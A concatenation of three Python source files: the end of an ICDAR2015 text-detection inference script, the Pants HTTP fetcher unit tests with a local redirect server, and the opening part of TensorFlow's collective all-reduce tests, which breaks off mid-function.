end = min(start + nr_image, nr_records)
split_records = real_test_img_list[start:end]
proc = Process(target=self.worker, args=(int(gpu_id), split_records, det_net, result_queue))
print('process:%d, start:%d, end:%d' % (i, start, end))
proc.start()
procs.append(proc)
for i in range(nr_records):
res = result_queue.get()
tools.makedirs(os.path.join(save_path, 'icdar2015_res'))
if res['boxes'].shape[0] == 0:
fw_txt_dt = open(os.path.join(save_path, 'icdar2015_res', 'res_{}.txt'.format(res['image_id'].split('/')[-1].split('.')[0])),
'w')
fw_txt_dt.close()
pbar.update(1)
fw = open(txt_name, 'a+')
fw.write('{}\n'.format(res['image_id'].split('/')[-1]))
fw.close()
continue
x1, y1, x2, y2, x3, y3, x4, y4 = res['boxes'][:, 0], res['boxes'][:, 1], res['boxes'][:, 2], res['boxes'][:, 3],\
res['boxes'][:, 4], res['boxes'][:, 5], res['boxes'][:, 6], res['boxes'][:, 7]
x1, y1 = x1 * res['scales'][0], y1 * res['scales'][1]
x2, y2 = x2 * res['scales'][0], y2 * res['scales'][1]
x3, y3 = x3 * res['scales'][0], y3 * res['scales'][1]
x4, y4 = x4 * res['scales'][0], y4 * res['scales'][1]
boxes = np.transpose(np.stack([x1, y1, x2, y2, x3, y3, x4, y4]))
if self.args.show_box:
boxes = backward_convert(boxes, False)
nake_name = res['image_id'].split('/')[-1]
tools.makedirs(os.path.join(save_path, 'icdar2015_img_vis'))
draw_path = os.path.join(save_path, 'icdar2015_img_vis', nake_name)
draw_img = np.array(cv2.imread(res['image_id']), np.float32)
drawer = DrawBox(self.cfgs)
final_detections = drawer.draw_boxes_with_label_and_scores(draw_img,
boxes=boxes,
labels=res['labels'],
scores=res['scores'],
method=1,
in_graph=False)
cv2.imwrite(draw_path, final_detections)
else:
fw_txt_dt = open(os.path.join(save_path, 'icdar2015_res', 'res_{}.txt'.format(res['image_id'].split('/')[-1].split('.')[0])), 'w')
for box in boxes:
line = '%d,%d,%d,%d,%d,%d,%d,%d\n' % (box[0], box[1], box[2], box[3],
box[4], box[5], box[6], box[7])
fw_txt_dt.write(line)
fw_txt_dt.close()
fw = open(txt_name, 'a+')
fw.write('{}\n'.format(res['image_id'].split('/')[-1]))
fw.close()
pbar.set_description("Test image %s" % res['image_id'].split('/')[-1])
pbar.update(1)
for p in procs:
p.join()
def get_test_image(self):
txt_name = '{}.txt'.format(self.cfgs.VERSION)
if not self.args.show_box:
if not os.path.exists(txt_name):
fw = open(txt_name, 'w')
fw.close()
fr = open(txt_name, 'r')
img_filter = fr.readlines()
print('****************************' * 3)
print('Already tested imgs:', img_filter)
print('****************************' * 3)
fr.close()
test_imgname_list = [os.path.join(self.args.test_dir, img_name) for img_name in os.listdir(self.args.test_dir)
if img_name.endswith(('.jpg', '.png', '.jpeg', '.tif', '.tiff')) and
(img_name + '\n' not in img_filter)]
else:
test_imgname_list = [os.path.join(self.args.test_dir, img_name) for img_name in os.listdir(self.args.test_dir)
if img_name.endswith(('.jpg', '.png', '.jpeg', '.tif', '.tiff'))]
assert len(test_imgname_list) != 0, 'test_dir has no imgs there.' \
' Note that only the following image formats are supported: .jpg, .jpeg, .png, .tif, .tiff'
if self.args.num_imgs == np.inf:
real_test_img_list = test_imgname_list
else:
real_test_img_list = test_imgname_list[: self.args.num_imgs]
return real_test_img_list
|
test_fetcher.py
|
# coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import absolute_import, division, print_function, unicode_literals
import hashlib
import http.server
import os
import socketserver
import unittest
from builtins import open, str
from contextlib import closing, contextmanager
from functools import reduce
from io import BytesIO
from threading import Thread
import mock
import requests
from pants.net.http.fetcher import Fetcher
from pants.util.contextutil import temporary_dir, temporary_file
from pants.util.dirutil import safe_open, touch
class FetcherTest(unittest.TestCase):
def setUp(self):
self.requests = mock.Mock(spec=requests.Session)
self.response = mock.Mock(spec=requests.Response)
self.fetcher = Fetcher('/unused/root/dir', requests_api=self.requests)
self.listener = mock.create_autospec(Fetcher.Listener, spec_set=True)
def status_call(self, status_code, content_length=None):
return mock.call.status(status_code, content_length=content_length)
def ok_call(self, chunks):
return self.status_call(200, content_length=sum(len(c) for c in chunks))
def assert_listener_calls(self, expected_listener_calls, chunks, expect_finished=True):
expected_listener_calls.extend(mock.call.recv_chunk(chunk) for chunk in chunks)
if expect_finished:
expected_listener_calls.append(mock.call.finished())
self.assertEqual(expected_listener_calls, self.listener.method_calls)
def assert_local_file_fetch(self, url_prefix=''):
chunks = [b'0123456789', b'a']
with temporary_file() as fp:
for chunk in chunks:
fp.write(chunk)
fp.close()
self.fetcher.fetch(url_prefix + fp.name, self.listener, chunk_size_bytes=10)
self.assert_listener_calls([self.ok_call(chunks)], chunks)
self.requests.assert_not_called()
def test_file_path(self):
self.assert_local_file_fetch()
def test_file_scheme(self):
self.assert_local_file_fetch('file:')
def assert_local_file_fetch_relative(self, url, *rel_path):
expected_contents = b'proof'
with temporary_dir() as root_dir:
with safe_open(os.path.join(root_dir, *rel_path), 'wb') as fp:
fp.write(expected_contents)
with temporary_file() as download_fp:
Fetcher(root_dir).download(url, path_or_fd=download_fp)
download_fp.close()
with open(download_fp.name, 'rb') as fp:
self.assertEqual(expected_contents, fp.read())
def test_file_scheme_double_slash_relative(self):
self.assert_local_file_fetch_relative('file://relative/path', 'relative', 'path')
def test_file_scheme_embedded_double_slash(self):
self.assert_local_file_fetch_relative('file://a//strange//path', 'a', 'strange', 'path')
def test_file_scheme_triple_slash(self):
self.assert_local_file_fetch('file://')
def test_file_dne(self):
with temporary_dir() as base:
with self.assertRaises(self.fetcher.PermanentError):
self.fetcher.fetch(os.path.join(base, 'dne'), self.listener)
def test_file_no_perms(self):
with temporary_dir() as base:
no_perms = os.path.join(base, 'dne')
touch(no_perms)
os.chmod(no_perms, 0)
self.assertTrue(os.path.exists(no_perms))
with self.assertRaises(self.fetcher.PermanentError):
self.fetcher.fetch(no_perms, self.listener)
@contextmanager
def expect_get(self, url, chunk_size_bytes, timeout_secs, chunks=None, listener=True):
chunks = chunks or [b'0123456789', b'a']
size = sum(len(c) for c in chunks)
self.requests.get.return_value = self.response
self.response.status_code = 200
self.response.headers = {'content-length': str(size)}
self.response.iter_content.return_value = chunks
yield chunks, [self.ok_call(chunks)] if listener else []
# (Mock silently accepts a misspelled `expect_*` method, so use the real assert helpers.)
self.requests.get.assert_called_once_with(url, allow_redirects=True, stream=True,
timeout=timeout_secs)
self.response.iter_content.assert_called_once_with(chunk_size=chunk_size_bytes)
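# expect_get() above is a small context-manager fixture: it primes the mocked
# requests Session/Response before the yield, hands the fake chunks (plus the expected
# listener calls) to the test body, and asserts the GET / iter_content interactions
# after the body returns.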
def test_get(self):
with self.expect_get('http://bar',
chunk_size_bytes=1024,
timeout_secs=60) as (chunks, expected_listener_calls):
self.fetcher.fetch('http://bar',
self.listener,
chunk_size_bytes=1024,
timeout_secs=60)
self.assert_listener_calls(expected_listener_calls, chunks)
self.response.close.assert_called_once_with()
def test_checksum_listener(self):
digest = mock.Mock(spec=hashlib.md5())
digest.hexdigest.return_value = '42'
checksum_listener = Fetcher.ChecksumListener(digest=digest)
with self.expect_get('http://baz',
chunk_size_bytes=1,
timeout_secs=37) as (chunks, expected_listener_calls):
self.fetcher.fetch('http://baz',
checksum_listener.wrap(self.listener),
chunk_size_bytes=1,
timeout_secs=37)
self.assertEqual('42', checksum_listener.checksum)
def expected_digest_calls():
for chunk in chunks:
yield mock.call.update(chunk)
yield mock.call.hexdigest()
self.assertEqual(list(expected_digest_calls()), digest.method_calls)
self.assert_listener_calls(expected_listener_calls, chunks)
self.response.close.assert_called_once_with()
def concat_chunks(self, chunks):
return reduce(lambda acc, c: acc + c, chunks, b'')
def test_download_listener(self):
with self.expect_get('http://foo',
chunk_size_bytes=1048576,
timeout_secs=3600) as (chunks, expected_listener_calls):
with closing(BytesIO()) as fp:
self.fetcher.fetch('http://foo',
Fetcher.DownloadListener(fp).wrap(self.listener),
chunk_size_bytes=1024 * 1024,
timeout_secs=60 * 60)
downloaded = self.concat_chunks(chunks)
self.assertEqual(downloaded, fp.getvalue())
self.assert_listener_calls(expected_listener_calls, chunks)
self.response.close.assert_called_once_with()
def test_size_mismatch(self):
self.requests.get.return_value = self.response
self.response.status_code = 200
self.response.headers = {'content-length': '11'}
chunks = ['a', 'b']
self.response.iter_content.return_value = chunks
with self.assertRaises(self.fetcher.Error):
self.fetcher.fetch('http://foo',
self.listener,
chunk_size_bytes=1024,
timeout_secs=60)
self.requests.get.assert_called_once_with('http://foo', allow_redirects=True, stream=True,
timeout=60)
self.response.iter_content.assert_called_once_with(chunk_size=1024)
self.assert_listener_calls([self.status_call(200, content_length=11)], chunks,
expect_finished=False)
self.response.close.assert_called_once_with()
def test_get_error_transient(self):
self.requests.get.side_effect = requests.ConnectionError
with self.assertRaises(self.fetcher.TransientError):
self.fetcher.fetch('http://foo',
self.listener,
chunk_size_bytes=1024,
timeout_secs=60)
self.requests.get.assert_called_once_with('http://foo', allow_redirects=True, stream=True,
timeout=60)
def test_get_error_permanent(self):
self.requests.get.side_effect = requests.TooManyRedirects
with self.assertRaises(self.fetcher.PermanentError) as e:
self.fetcher.fetch('http://foo',
self.listener,
chunk_size_bytes=1024,
timeout_secs=60)
self.assertTrue(e.exception.response_code is None)
self.requests.get.assert_called_once_with('http://foo', allow_redirects=True, stream=True,
timeout=60)
def test_http_error(self):
self.requests.get.return_value = self.response
self.response.status_code = 404
with self.assertRaises(self.fetcher.PermanentError) as e:
self.fetcher.fetch('http://foo',
self.listener,
chunk_size_bytes=1024,
timeout_secs=60)
self.assertEqual(404, e.exception.response_code)
self.requests.get.assert_called_once_with('http://foo', allow_redirects=True, stream=True,
timeout=60)
self.listener.status.assert_called_once_with(404)
self.response.close.assert_called_once_with()
def test_iter_content_error(self):
self.requests.get.return_value = self.response
self.response.status_code = 200
self.response.headers = {}
self.response.iter_content.side_effect = requests.Timeout
with self.assertRaises(self.fetcher.TransientError):
self.fetcher.fetch('http://foo',
self.listener,
chunk_size_bytes=1024,
timeout_secs=60)
self.requests.get.assert_called_once_with('http://foo', allow_redirects=True, stream=True,
timeout=60)
self.response.iter_content.assert_called_once_with(chunk_size=1024)
self.listener.status.assert_called_once_with(200, content_length=None)
self.response.close.assert_called_once_with()
def expect_download(self, path_or_fd=None):
with self.expect_get('http://1',
chunk_size_bytes=13,
timeout_secs=13,
listener=False) as (chunks, expected_listener_calls):
path = self.fetcher.download('http://1',
path_or_fd=path_or_fd,
chunk_size_bytes=13,
timeout_secs=13)
      self.response.close.assert_called_once_with()
downloaded = self.concat_chunks(chunks)
return downloaded, path
def test_download(self):
downloaded, path = self.expect_download()
try:
with open(path, 'rb') as fp:
self.assertEqual(downloaded, fp.read())
finally:
os.unlink(path)
def test_download_fd(self):
with temporary_file() as fd:
downloaded, path = self.expect_download(path_or_fd=fd)
self.assertEqual(path, fd.name)
fd.close()
with open(path, 'rb') as fp:
self.assertEqual(downloaded, fp.read())
def test_download_path(self):
with temporary_file() as fd:
fd.close()
downloaded, path = self.expect_download(path_or_fd=fd.name)
self.assertEqual(path, fd.name)
with open(path, 'rb') as fp:
self.assertEqual(downloaded, fp.read())
@mock.patch('time.time')
def test_progress_listener(self, timer):
timer.side_effect = [0, 1.137]
stream = BytesIO()
progress_listener = Fetcher.ProgressListener(width=5, chunk_size_bytes=1, stream=stream)
with self.expect_get('http://baz',
chunk_size_bytes=1,
timeout_secs=37,
chunks=[[1]] * 1024) as (chunks, expected_listener_calls):
self.fetcher.fetch('http://baz',
progress_listener.wrap(self.listener),
chunk_size_bytes=1,
timeout_secs=37)
self.assert_listener_calls(expected_listener_calls, chunks)
# We just test the last progress line which should indicate a 100% complete download.
# We control progress bar width (5 dots), size (1KB) and total time downloading (fake 1.137s).
self.assertEqual('100% ..... 1 KB 1.137s\n', stream.getvalue().decode('utf-8').split('\r')[-1])
class FetcherRedirectTest(unittest.TestCase):
# NB(Eric Ayers): Using class variables like this seems horrible, but I can't figure out a better
# to pass state between the test and the RedirectHTTPHandler class because it gets
# re-instantiated on every request.
_URL = None
_URL2_ACCESSED = False
_URL1_ACCESSED = False
# A trivial HTTP server that serves up a redirect from /url2 --> /url1 and some hard-coded
# responses in the HTTP message body.
class RedirectHTTPHandler(http.server.BaseHTTPRequestHandler):
def __init__(self, request, client_address, server):
      # BaseHTTPRequestHandler parses the request and dispatches to do_GET from
      # its __init__, so we simply delegate to the base class here.
      http.server.BaseHTTPRequestHandler.__init__(self, request, client_address, server)
def do_GET(self):
if self.path.endswith('url2'):
self.send_response(302)
redirect_url = '{}/url1'.format(FetcherRedirectTest._URL)
        self.send_header('Location', redirect_url)
self.end_headers()
self.wfile.write('redirecting you to {}'.format(redirect_url).encode('utf-8'))
FetcherRedirectTest._URL2_ACCESSED = True
elif self.path.endswith('url1'):
self.send_response(200)
self.end_headers()
self.wfile.write(b'returned from redirect')
FetcherRedirectTest._URL1_ACCESSED = True
else:
self.send_response(404)
self.end_headers()
@contextmanager
def setup_server(self):
httpd = None
httpd_thread = None
try:
handler = self.RedirectHTTPHandler
httpd = socketserver.TCPServer(('localhost', 0), handler)
port = httpd.server_address[1]
httpd_thread = Thread(target=httpd.serve_forever)
httpd_thread.start()
yield 'http://localhost:{0}'.format(port)
finally:
if httpd:
httpd.shutdown()
if httpd_thread:
httpd_thread.join()
def test_download_redirect(self):
"""Make sure that a server that returns a redirect is actually followed.
Test with a real HTTP server that redirects from one URL to another.
"""
fetcher = Fetcher('/unused/root/dir')
with self.setup_server() as base_url:
      FetcherRedirectTest._URL = base_url
self.assertFalse(self._URL2_ACCESSED)
self.assertFalse(self._URL1_ACCESSED)
path = fetcher.download(base_url + '/url2')
self.assertTrue(self._URL2_ACCESSED)
self.assertTrue(self._URL1_ACCESSED)
with open(path) as fp:
self.assertIn(fp.read(), ['returned from redirect\n', 'returned from redirect\r\n'])
|
cross_device_ops_test.py
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for CrossDeviceOps."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import os
import threading
import time
from absl.testing import parameterized
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import tensorflow_server_pb2
from tensorflow.python.distribute import cluster_resolver as cluster_resolver_lib
from tensorflow.python.distribute import collective_util
from tensorflow.python.distribute import combinations
from tensorflow.python.distribute import cross_device_ops as cross_device_ops_lib
from tensorflow.python.distribute import cross_device_utils
from tensorflow.python.distribute import device_util
from tensorflow.python.distribute import multi_process_runner
from tensorflow.python.distribute import multi_worker_test_base
from tensorflow.python.distribute import reduce_util
from tensorflow.python.distribute import test_util
from tensorflow.python.distribute import values as value_lib
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.eager import test
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import indexed_slices
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import collective_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.util import nest
CollectiveReplicaLauncher = cross_device_utils.CollectiveReplicaLauncher
CommunicationImplementation = collective_util.CommunicationImplementation
ReduceOp = reduce_util.ReduceOp
IndexedSlicesValue = indexed_slices.IndexedSlicesValue
IndexedSlices = indexed_slices.IndexedSlices
def make_per_replica_value(value, devices):
"""Creates a `PerReplica` object whose values reside in `devices`.
Args:
value: a tensor-convertible value or a `IndexedSlicesValue`, or a callable
that takes one argument (`device_idx`) and should return the value that is
going to be created on devices[device_idx].
devices: a list of device strings to create `PerReplica` values on.
Returns:
A `PerReplica` object.
"""
values = []
for device_idx, device in enumerate(devices):
if callable(value):
v = value(device_idx)
elif isinstance(value, list):
v = value[device_idx]
else:
v = value
if isinstance(v, IndexedSlicesValue):
with ops.device(device):
values.append(
IndexedSlices(
values=array_ops.identity(v.values),
indices=array_ops.identity(v.indices),
dense_shape=array_ops.identity(v.dense_shape)))
else:
with ops.device(device):
values.append(array_ops.identity(v))
return value_lib.PerReplica(values)
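# A minimal usage sketch for `make_per_replica_value` (illustrative only; the
# CPU device strings below are placeholders, not the devices the tests use).
def _example_make_per_replica_value():
  example_devices = ["/device:CPU:0", "/device:CPU:0"]
  # A plain value is replicated as-is; a callable receives the device index.
  replicated = make_per_replica_value(1.0, example_devices)
  indexed = make_per_replica_value(lambda device_idx: float(device_idx), example_devices)
  return replicated, indexed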
def enable_collective_ops():
"""Enable collectives in the current process."""
cluster_resolver = cluster_resolver_lib.TFConfigClusterResolver()
context.context().configure_collective_ops(
collective_leader="'/job:worker/replica:0/task:0'")
config_proto = config_pb2.ConfigProto()
config_proto.experimental.collective_group_leader = (
"/job:worker/replica:0/task:0")
server_def = tensorflow_server_pb2.ServerDef(
cluster=cluster_resolver.cluster_spec().as_cluster_def(),
default_session_config=config_proto,
job_name=cluster_resolver.task_type,
task_index=cluster_resolver.task_id,
protocol=cluster_resolver.rpc_layer)
context.context().enable_collective_ops(server_def)
# Recover default flag values.
CollectiveReplicaLauncher._prefer_unique_instance_key = True
CollectiveReplicaLauncher._prefer_ordering_token = False
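# Sketch of the TF_CONFIG layout that `TFConfigClusterResolver` parses when
# `enable_collective_ops` runs inside a worker process; the host/port values
# below are placeholders for illustration, not real cluster configuration.
_EXAMPLE_TF_CONFIG = {
    "cluster": {"worker": ["localhost:12345", "localhost:23456"]},
    "task": {"type": "worker", "index": 0},
}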
class MultiProcessPoolRunner():
def __init__(self, num_processes):
cluster_spec_dict = multi_worker_test_base.create_cluster_spec(
num_workers=num_processes)
self.runner = multi_process_runner.MultiProcessPoolRunner(cluster_spec_dict)
# Global MultiProcessPoolRunners that can be shared by test cases to avoid
# expensive initialization cost of TensorFlow in new processes.
#
# Note that they have to be globals and can't be owned by test classes because
# fn usually captures the test class instance, and the test class
# instance can't be pickled if it has mpr as a member (it is not allowed to
# pickle Process objects).
# TODO(crccw): Use `num_workers` combination once it is ready.
global_mpr_2p = MultiProcessPoolRunner(num_processes=2)
global_mpr_1p = MultiProcessPoolRunner(num_processes=1)
def get_global_mpr(num_processes):
if num_processes == 1:
return global_mpr_1p.runner
elif num_processes == 2:
return global_mpr_2p.runner
else:
raise ValueError("get_global_mpr: num_processes must be 1 or 2, got %d" %
num_processes)
class CollectiveOpsTest(test.TestCase, parameterized.TestCase):
def setUp(self):
super().setUp()
# Enabling collectives can be done in "setUpClass", but requires using
# different collective_keys in different tests as collectives are reused
# across tests. Always resetting collective ops before each test offers
# better test isolation.
global_mpr_1p.runner.run(enable_collective_ops)
global_mpr_2p.runner.run(enable_collective_ops)
def make_collective(self, num_processes, gpu_per_process):
"""Returns collectives and other info to be used in tests.
Args:
num_processes: an integer indicating the number of processes that
participate in the collective.
gpu_per_process: number of GPUs (0 if no GPUs) used by each process.
Returns:
      A tuple of (collective, devices, pid) where collective is an instance
      of `CollectiveAllReduce`, devices are a list of local devices (str)
      attached to the current process, and pid is the id of this process among
      all participating processes.
"""
cluster_resolver = cluster_resolver_lib.TFConfigClusterResolver()
devices = [
"/job:worker/replica:0/task:%d/device:CPU:0" % cluster_resolver.task_id
]
if gpu_per_process > 0:
devices = [
"/job:worker/replica:0/task:%d/device:GPU:%d" %
(cluster_resolver.task_id, i) for i in range(gpu_per_process)
]
group_size = num_processes * len(devices)
collective = cross_device_ops_lib.CollectiveAllReduce(
devices=devices, group_size=group_size)
return collective, devices, cluster_resolver.task_id
def as_list(self, value):
"""An utility to convert a `Mirrored`, `Tensor` or `IndexedSlices` to a list.
The reason it exists is to provide a uniformed view of returned value of
"reduce" calls, especially across tf.function boundaries. Returning
`Mirrored` from a tf.function will only evaluate the primary value, which
makes collective ops of non-primary device being pruned, and will eventually
cause hanging.
Args:
value: the value to convert, can be one of `Mirrored`, `Tensor` and
`IndexedSlices`.
Returns:
A list of `Tensor` or `IndexedSlices`.
"""
if isinstance(value, ops.Tensor):
return [value]
elif isinstance(value, IndexedSlices):
return [value]
elif isinstance(value, value_lib.Mirrored):
return value.values
else:
raise ValueError("unwrap: unsupported input type: %s" % type(value))
RunOptions = collections.namedtuple( # pylint: disable=invalid-name
"RunOptions",
[
"mode", # A list of str from ["eager", "func_graph"]
"num_processes",
"gpus_per_process",
"reduce_op",
"communication_options",
"prefer_unique_instance_key",
])
RunOptions.__new__.__defaults__ = (["eager",
"func_graph"], 2, 0, ReduceOp.SUM,
collective_util.Options(), True)
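  # Illustrative example: override a couple of fields and keep the defaults
  # declared above for the rest (the particular values here are arbitrary).
  _EXAMPLE_RUN_OPTIONS = RunOptions(num_processes=1, reduce_op=ReduceOp.MEAN)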
def reduce_and_verify(self, inputs, expect, options):
"""Reduce the given `inputs` and verify the output matches `expect`.
Args:
inputs: a list of `Tensor` or `IndexedSlices`, where i-th value will be
fed to i-th replica.
expect: a `Tensor` or `IndexedSlices`. This should be the expected value
for one replica.
      options: a `RunOptions` instance.
"""
def replica_fn():
CollectiveReplicaLauncher._prefer_unique_instance_key = (
options.prefer_unique_instance_key)
collective, devices, pid = self.make_collective(options.num_processes,
options.gpus_per_process)
def reduce_fn():
value_fn = lambda device_idx: inputs[pid * len(devices) + device_idx]
per_replica_value = make_per_replica_value(value_fn, devices)
reduced_values = collective.reduce(options.reduce_op, per_replica_value,
per_replica_value,
options.communication_options)
if options.gpus_per_process > 1:
self.assertIsInstance(reduced_values, value_lib.Mirrored)
reduced_values = self.as_list(reduced_values)
self.assertAllEqual(devices, [v.device for v in reduced_values])
return [ops.convert_to_tensor(v) for v in reduced_values]
per_replica_expect = [ops.convert_to_tensor(expect)] * len(devices)
if "eager" in options.mode:
got = reduce_fn()
self.assertAllClose(got, per_replica_expect)
if "func_graph" in options.mode:
got = def_function.function(reduce_fn)()
self.assertAllClose(got, per_replica_expect)
get_global_mpr(options.num_processes).run(replica_fn)
def batch_reduce_and_verify(self, inputs, expect, options):
"""Batch reduce the given `inputs` and verify the output matches `expect`.
Args:
inputs: a 2-level nested list of `Tensor` or `IndexedSlices`, where i-th
value will be fed to i-th replica.
expect: a list of `Tensor` or `IndexedSlices`. This should be the expected
value for one replica.
      options: a `RunOptions` instance.
"""
def replica_fn():
CollectiveReplicaLauncher._prefer_unique_instance_key = (
options.prefer_unique_instance_key)
collective, devices, pid = self.make_collective(options.num_processes,
options.gpus_per_process)
def batch_reduce_fn():
batch_size = len(inputs[0])
value_dst_pairs = []
for i in range(batch_size):
def value_fn(device_idx, idx=i):
return inputs[pid * len(devices) + device_idx][idx]
per_replica_value = make_per_replica_value(value_fn, devices)
value_dst_pairs.append((per_replica_value, per_replica_value))
reduced_values = collective.batch_reduce(options.reduce_op,
value_dst_pairs,
options.communication_options)
if options.gpus_per_process > 1:
for v in reduced_values:
self.assertIsInstance(v, value_lib.Mirrored)
reduced_values = [self.as_list(v) for v in reduced_values]
for v in reduced_values:
self.assertAllEqual(devices, [t.device for t in v])
return nest.map_structure(ops.convert_to_tensor, reduced_values)
per_replica_expect = nest.map_structure(
lambda x: [ops.convert_to_tensor(x)] * len(devices), expect)
if "eager" in options.mode:
got = batch_reduce_fn()
self.assertAllClose(got, per_replica_expect)
if "func_graph" in options.mode:
got = def_function.function(batch_reduce_fn)()
self.assertAllClose(got, per_replica_expect)
get_global_mpr(options.num_processes).run(replica_fn)
@combinations.generate(
combinations.combine(
num_processes=[1, 2],
required_gpus=[0, 1, 2],
implementation=[
CommunicationImplementation.AUTO,
CommunicationImplementation.RING,
CommunicationImplementation.NCCL,
],
reduce_op=[ReduceOp.SUM, ReduceOp.MEAN],
prefer_unique_instance_key=[True, False]))
def testReduceDense(self, num_processes, required_gpus, implementation,
reduce_op, prefer_unique_instance_key):
if (required_gpus == 0 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip CPU + NCCL combination")
if (num_processes == 2 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip NCCL + 2 processes combination. NCCL requires "
"physical GPUs for every process.")
options = self.RunOptions(
num_processes=num_processes,
gpus_per_process=required_gpus,
reduce_op=reduce_op,
communication_options=collective_util.Options(
implementation=implementation),
prefer_unique_instance_key=prefer_unique_instance_key)
group_size = options.num_processes * (options.gpus_per_process or 1)
inputs_data = [1.0, 2.0, 3.0, 4.0]
inputs = inputs_data[0:group_size]
if group_size == 1:
expect = 1.0
if group_size == 2:
expect = 3.0 if reduce_op == ReduceOp.SUM else 1.5
elif group_size == 4:
expect = 10.0 if reduce_op == ReduceOp.SUM else 2.5
self.reduce_and_verify(inputs, expect, options)
@combinations.generate(
combinations.combine(
num_processes=[1, 2],
required_gpus=[0, 1, 2],
implementation=[
CommunicationImplementation.AUTO,
CommunicationImplementation.RING,
CommunicationImplementation.NCCL,
],
# TODO(b/166682130): add MEAN reduce once the bug is fixed.
reduce_op=ReduceOp.SUM,
prefer_unique_instance_key=[True, False]))
def testReduceSparse(self, num_processes, required_gpus, implementation,
reduce_op, prefer_unique_instance_key):
if (required_gpus == 0 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip CPU + NCCL combination")
if (num_processes == 2 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip NCCL + 2 processes combination. NCCL requires "
"physical GPUs for every process.")
options = self.RunOptions(
mode=["func_graph"], # Sparse reduce is not supported in eager.
num_processes=num_processes,
gpus_per_process=required_gpus,
reduce_op=reduce_op,
communication_options=collective_util.Options(
implementation=implementation),
prefer_unique_instance_key=prefer_unique_instance_key)
group_size = options.num_processes * (options.gpus_per_process or 1)
inputs_data = [
IndexedSlicesValue(
values=[[1.], [2.]], indices=[0, 1], dense_shape=[10, 1]),
IndexedSlicesValue(
values=[[3.], [4.]], indices=[1, 2], dense_shape=[10, 1]),
IndexedSlicesValue(
values=[[5.], [6.]], indices=[7, 8], dense_shape=[10, 1]),
IndexedSlicesValue(
values=[[7.], [8.]], indices=[3, 2], dense_shape=[10, 1]),
]
inputs = inputs_data[0:group_size]
if group_size == 1:
expect = IndexedSlices(
values=[[1.], [2.]], indices=[0, 1], dense_shape=[10, 1])
elif group_size == 2:
expect = IndexedSlices(
values=[[1.], [2.], [3.], [4.]],
indices=[0, 1, 1, 2],
dense_shape=[10, 1])
elif group_size == 4:
expect = IndexedSlices(
values=[[1.], [2.], [3.], [4.], [5.], [6.], [7.], [8.]],
indices=[0, 1, 1, 2, 7, 8, 3, 2],
dense_shape=[10, 1])
self.reduce_and_verify(inputs, expect, options)
@combinations.generate(
combinations.combine(prefer_unique_instance_key=[True, False]))
def testReduceSparseVariableLength(self, prefer_unique_instance_key):
# One device per process, 2 processes, 2 replicas in total.
inputs = [
IndexedSlicesValue(values=[[1.]], indices=[0], dense_shape=[10, 1]),
IndexedSlicesValue(
values=[[2.], [3.], [4.]], indices=[0, 1, 2], dense_shape=[10, 1]),
]
expect = IndexedSlices(
values=[[1.], [2.], [3.], [4.]],
indices=[0, 0, 1, 2],
dense_shape=[10, 1])
self.reduce_and_verify(
inputs,
expect,
self.RunOptions(
mode=["func_graph"], # Sparse reduce is not supported in eager.
num_processes=2,
reduce_op=ReduceOp.SUM,
prefer_unique_instance_key=prefer_unique_instance_key))
@combinations.generate(
combinations.combine(
num_processes=[1, 2],
required_gpus=[0, 1, 2],
implementation=[
CommunicationImplementation.AUTO,
CommunicationImplementation.RING,
CommunicationImplementation.NCCL,
],
reduce_op=[ReduceOp.SUM, ReduceOp.MEAN],
prefer_unique_instance_key=[True, False]))
def testBatchReduceDense(self, num_processes, required_gpus, implementation,
reduce_op, prefer_unique_instance_key):
if (required_gpus == 0 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip CPU + NCCL combination")
if (num_processes == 2 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip NCCL + 2 processes combination. NCCL requires "
"physical GPUs for every process.")
options = self.RunOptions(
num_processes=num_processes,
gpus_per_process=required_gpus,
reduce_op=reduce_op,
communication_options=collective_util.Options(
implementation=implementation),
prefer_unique_instance_key=prefer_unique_instance_key)
group_size = options.num_processes * (options.gpus_per_process or 1)
inputs_data = [[1.0, 2.0], [3.0, 4.0], [5.0, 6.0], [7.0, 8.0]]
inputs = inputs_data[0:group_size]
if group_size == 1:
expect = [1.0, 2.0]
if group_size == 2:
expect = [4.0, 6.0] if reduce_op == ReduceOp.SUM else [2.0, 3.0]
elif group_size == 4:
expect = [16.0, 20.0] if reduce_op == ReduceOp.SUM else [4.0, 5.0]
self.batch_reduce_and_verify(inputs, expect, options)
@combinations.generate(
combinations.combine(
num_processes=[1, 2],
required_gpus=[0, 1, 2],
implementation=[
CommunicationImplementation.AUTO,
CommunicationImplementation.RING,
CommunicationImplementation.NCCL,
],
# TODO(b/166682130): add MEAN reduce once the bug is fixed.
reduce_op=ReduceOp.SUM,
prefer_unique_instance_key=[True, False]))
def testBatchReduceSparse(self, num_processes, required_gpus, implementation,
reduce_op, prefer_unique_instance_key):
if (required_gpus == 0 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip CPU + NCCL combination")
if (num_processes == 2 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip NCCL + 2 processes combination. NCCL requires "
"physical GPUs for every process.")
options = self.RunOptions(
mode=["func_graph"], # Sparse reduce is not supported in eager.
num_processes=num_processes,
gpus_per_process=required_gpus,
reduce_op=reduce_op,
